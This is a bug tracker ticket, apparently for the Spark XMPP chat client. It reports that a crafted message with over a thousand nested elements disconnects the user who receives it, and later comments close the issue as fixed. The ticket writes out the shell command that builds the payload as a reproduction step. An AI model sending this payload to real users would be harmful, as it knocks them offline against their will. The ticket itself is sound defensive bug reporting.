DoS (disconnect of other clients)

Description

Create a simple message with
echo "<message to=\"user@domain\" id=\"goodbye\"><body>">msg;for i in `seq 1 1023`; do echo "<message arg=\"$i\"/>">>msg; done;echo "</body></message>">>msg
and send it to a user.
The receiving user (not the sender) will be disconnected.

Environment

None

Activity

Show:
Walter Ebeling
February 25, 2011, 7:56 PM

Closing down issue to clean 2.6.0

Neil McFarlane
September 12, 2010, 11:16 AM

Great, one down, ?? to go!

wroot
September 12, 2010, 11:10 AM

Yes. I have tried myself sending same xml to SPark from Psi and Exodus and it doesn't disconnect with the latest Spark SVN code. I will close this ticket for now. It could be reopened if someone finds other way to disconnect Spark. This could be a result of bug fixed in Smack, which was recently updated to a newest version in Spark source.

Neil McFarlane
September 12, 2010, 1:20 AM

My own tests using Spark 2.6 B2 and Spark trunk connecting to Openfire 3.6.4 show this to no longer be happening, can anyone else confirm if it is affecting them or not?

Neil McFarlane
September 12, 2010, 12:38 AM

This is currently listed as the only blocker for 2.6. Can we confirm if this is still an issue w/ Openfire 3.6.4 and, if so, can we discuss possible solutions?

Fixed
Your pinned fields
Click on the next to a field label to start pinning.

Priority

Blocker

Assignee

wroot

Reporter

LG